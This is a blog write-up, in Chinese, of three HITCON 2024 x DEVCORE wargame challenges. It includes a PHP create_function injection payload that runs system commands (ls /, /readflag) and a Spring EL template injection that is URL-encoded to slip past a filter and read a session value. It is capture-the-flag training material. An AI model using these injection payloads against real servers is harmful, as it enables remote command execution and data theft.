<!DOCTYPE html>
<html lang="en">
  <head>
  <meta charset="UTF-8" />
  <meta http-equiv="X-UA-Compatible" content="IE=edge" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <meta name="google-site-verification" content="5tL3vVFDCs7jVMzgjoYnu0u--R7lK5YU0vkMz_MQxdA" />
  <title>Unicorn's Blog | HITCON 2024 x DEVCORE Wargame</title>
  <link rel="icon" type="image/png" href="/~b12902079/assets/images/profile_picture.jpg">
  
  <link rel="stylesheet" href="/~b12902079/assets/css/post.css" />
  <link rel="stylesheet" href="/~b12902079/assets/css/syntax.css" />
  
  <link rel="stylesheet" href="/~b12902079/assets/css/common.css" />
  <script src="https://cdn.jsdelivr.net/npm/mathjax@2/MathJax.js?config=TeX-AMS-MML_HTMLorMML" type="text/javascript"></script>
  <script src="/~b12902079/assets/js/categories.js"></script>
  <script>
    const currentTheme = localStorage.getItem("theme");
    if (currentTheme) {
      document.documentElement.setAttribute(
        "data-theme",
        localStorage.getItem("theme")
      );
    }
  </script>
  
  <script defer src="/~b12902079/assets/js/collapsible.js"></script>
  <script defer src="/~b12902079/assets/js/lbox.js"></script>
  
</head>

  <body>
    <main>
      <header>
  <a class="site-title" href="/~b12902079/">Unicorn's Blog</a>
  <!-- dark/light mode -->
  <span id="dark-mode-toggle" style="cursor: pointer">
    <svg
      stroke="currentColor"
      fill="currentColor"
      stroke-width="0"
      viewBox="0 0 16 16"
      height="1.2em"
      width="1.2em"
      xmlns="http://www.w3.org/2000/svg"
    >
      <path
        d="M8 1a7 7 0 1 0 0 14A7 7 0 0 0 8 1zm0 13V2a6 6 0 1 1 0 12z"
      ></path>
    </svg>
  </span>
</header>

      <section class="article">
        <div class="article-header">
          <h2 class="article-title">HITCON 2024 x DEVCORE Wargame</h2>
          <small class="date">12 Aug 2024</small>
          <div class="categories">
            
            <a href="#!" class="category">writeup</a>
            
          </div>
        </div>
        <ul class="content"><li><a href="#welcome">Welcome</a></li><li><a href="#supercalifragilisticexpialidocious">Supercalifragilisticexpialidocious</a></li><li><a href="#expressionism">Expressionism</a></li></ul>
        <div class="content"><h1 id="welcome">Welcome</h1>

<p><img src="/~b12902079/assets/images/HITCON-2024-x-DEVCORE-Wargame/welcome.png" alt="image" /></p>

<p>使用<a href="https://www.dcode.fr/rc4-cipher">線上工具</a>解密</p>

<p><img src="/~b12902079/assets/images/HITCON-2024-x-DEVCORE-Wargame/welcome-solve.png" alt="image" /></p>

<p>flag: <code class="language-plaintext highlighter-rouge">DEVCORE{h0pe_y0u_enj0y_0ur_wargame}</code></p>

<h1 id="supercalifragilisticexpialidocious">Supercalifragilisticexpialidocious</h1>

<p>明顯 <code class="language-plaintext highlighter-rouge">create_function('', $code);</code> 有洞。</p>

<p><img src="/~b12902079/assets/images/HITCON-2024-x-DEVCORE-Wargame/Supercalifragilisticexpialidocious.png" alt="image" /></p>

<p>使用 <a href="https://www.exploit-db.com/exploits/32417">exploitDB</a> 的 payload</p>

<p>payload: <code class="language-plaintext highlighter-rouge">return -1 * var_dump($a[""]);}phpinfo();/*"]</code></p>

<p>成功看到 <code class="language-plaintext highlighter-rouge">phpinfo()</code>。</p>

<p><img src="/~b12902079/assets/images/HITCON-2024-x-DEVCORE-Wargame/Supercalifragilisticexpialidocious-phpinfo.png" alt="image" /></p>

<p>payload: <code class="language-plaintext highlighter-rouge">return -1 * var_dump($a[""]);}system('ls /');/*"]</code></p>

<p>發現 <code class="language-plaintext highlighter-rouge">/readflag</code>。</p>

<p><img src="/~b12902079/assets/images/HITCON-2024-x-DEVCORE-Wargame/Supercalifragilisticexpialidocious-ls.png" alt="image" /></p>

<p>payload: <code class="language-plaintext highlighter-rouge">return -1 * var_dump($a[""]);}system('/readflag');/*"]</code></p>

<p>執行成功取得 flag。</p>

<p><img src="/~b12902079/assets/images/HITCON-2024-x-DEVCORE-Wargame/Supercalifragilisticexpialidocious-readflag.png" alt="image" /></p>

<p>flag: <code class="language-plaintext highlighter-rouge">DEVCORE{o1d_th1ng_1s_g00d}</code></p>

<h1 id="expressionism">Expressionism</h1>

<p>在 <code class="language-plaintext highlighter-rouge">IndexController.java</code> 看到 <code class="language-plaintext highlighter-rouge">FLAG</code> 被放在 session。</p>

<div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">session</span><span class="o">.</span><span class="na">setAttribute</span><span class="o">(</span><span class="s">"FLAG"</span><span class="o">,</span> <span class="nc">System</span><span class="o">.</span><span class="na">getenv</span><span class="o">(</span><span class="s">"FLAG"</span><span class="o">));</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">index.jsp</code> 中有可以 injection 的地方。</p>

<div class="language-jsp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt">&lt;p&gt;&lt;spring:message </span><span class="na">code=</span><span class="s">"life.quotes.${id}"</span> <span class="nt">/&gt;&lt;/p&gt;</span>
</code></pre></div></div>

<p>在 <a href="https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#spring-framework-java">Hack tricks</a> 找到可用 <code class="language-plaintext highlighter-rouge">${}</code> injection。</p>

<p>payload: <code class="language-plaintext highlighter-rouge">/?id=${FLAG}</code></p>

<p>送出後發現有違法字元。</p>

<p><img src="/~b12902079/assets/images/HITCON-2024-x-DEVCORE-Wargame/Expressionism-payload.png" alt="image" /></p>

<p>payload: <code class="language-plaintext highlighter-rouge">/?id=%24%7BFLAG%7D</code></p>

<p>把 payload 做 url encoding 後再試一次，成功取得 flag。</p>

<p><img src="/~b12902079/assets/images/HITCON-2024-x-DEVCORE-Wargame/Expressionism-success.png" alt="image" /></p>

<p>flag: <code class="language-plaintext highlighter-rouge">DEVCORE{d1d_y0u_kn0w_th1s_b3f0r3}</code></p>
</div>
      </section>
      <footer>
  <p>&copy; 2024 - 2025 | Unicorn's Blog</p>
</footer>
<script src="/~b12902079/assets/js/mode.js" defer></script>

    </main>
    <section id="category-modal-bg"></section>
<section id="category-modal">
  <h1 id="category-modal-title"></h1>
  <section id="category-modal-content"></section>
</section>

  </body>
</html>
